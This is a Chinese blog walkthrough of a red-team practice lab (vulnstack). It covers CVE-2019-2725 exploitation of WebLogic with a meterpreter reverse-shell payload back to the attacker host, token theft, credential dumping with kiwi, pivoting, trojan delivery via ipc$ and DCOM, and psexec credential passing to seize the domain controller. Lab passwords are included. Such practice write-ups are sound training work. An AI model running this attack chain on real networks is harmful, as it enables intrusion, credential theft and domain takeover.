| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> ATT&CK实战系列(二) -> 正文阅读 |
|
[系统运维]ATT&CK实战系列(二) |
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情 拓扑结构大体如下: 环境搭建 Kali ip:192.168.111.135 Web Ip1:192.168.111.80 Ip2:10.10.10.80 os:windows 2008 应用:weblogic 10.3.6 mssql 2008 Pc Ip1:192.168.111.201 Ip2:10.10.10.201 Os:windows7 DC ip:10.10.10.10 os:windows 2012 应用:AD域 内网:10.10.10.0/24 外网:192.168.111.0/24 从web机开始渗透, 这里需要手动开启服务,在C: \Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行 账号/密码:Administrator/1qaz@WSX 外网渗透
然后对80 主机进行信息收集扫描 通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞. ? 开放139端口 就纯真samba服务 于是判断可能会有/远程命令执行漏洞 ? 开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令 ? 开放3389 那就是远程桌面喽 ? 7001端口 百度了一下得知是 weblogic服务 ? weblogicScan进行扫描漏洞 然后百度了一下 CVE-2019-2725漏洞 CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞 然后通过msf查看一下漏洞利用脚本 然后进入开始利用模块 use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块 set target windows????? 这个模块默认是unix 所以我们的目标是windows 所以 改一下即可 Set payload? windows/x64/meterpreter/reverse_tcp? set LHOST 192.168.111.135 Set rhosts 192.168.111.80? 要攻击目标 run ? 本来想直接提权,但是发现不能提system权限 system权限 方法1. 然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限 方法2. 还可以通过令牌窃取的方式进行提权 load incognito ????????????#加载incognito(伪装) Getuid???????????????????????? #查看当前token list_tokens -u???????????? ?#列出可用token ?impersonate_token "NT AUTHORITY\\SYSTEM"???? #token窃取,格式为impersonate_token"主机名\\用户名" rev2self ?????????????????????#返回之前的token 然后使用 kiwi 获取 hash 账号密码 然后获得了域里的用户和密码 下面使用用户密码进行远程登录 开始第二阶段的信息搜集 Net? config workstation? #查域信息 得到域信息 还有10.10.10.0/24网段 设置一条通往10.10.10.0/24网段的路由 然后设置代理 使用use post/windows/gather/arp_scanner模块 扫描网段存活主机 然后又通过web 进行信息收集了一下 得知 10.10.10.10 就是域控 域成员 处理web? 还有一个PC机 然后判断PC ip是10.10.10.201 下面渗透pc域用户 方法一 首先用kali生成一个payload 然后通过web机 上传到 10.10.10.201c盘 先上传到web里 ? 再控制WEB主机与PC建立一个ipc$连接: net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator 然后把刚才上传的文件copy到10.10.10.201 c盘 ? 然后再meterpreter中载入powershell模块 在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马: ? 然后从新开启一个msf 监听生成的 payload 1520 端口 ? 成功反弹 下面开始提权 方法二 代理nmap扫描10.10.10.201 使用 exploit/windows/smb/psexec模块进行哈希传递 由于一开始再web机得知了域\用户\密码 说以就可以用这个模块直接打了 Set smbdomain? DE1AY? #域 Set smbuser ?administrator # 域用户 Set smbpass? lbb1111..???? #域用户密码 直接system权限 通过扫描得知3389是开哒 然后尝试一下代理远程能不能直接登录
同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递 拿下域控制器 并且是system权限 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/16 5:42:19- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |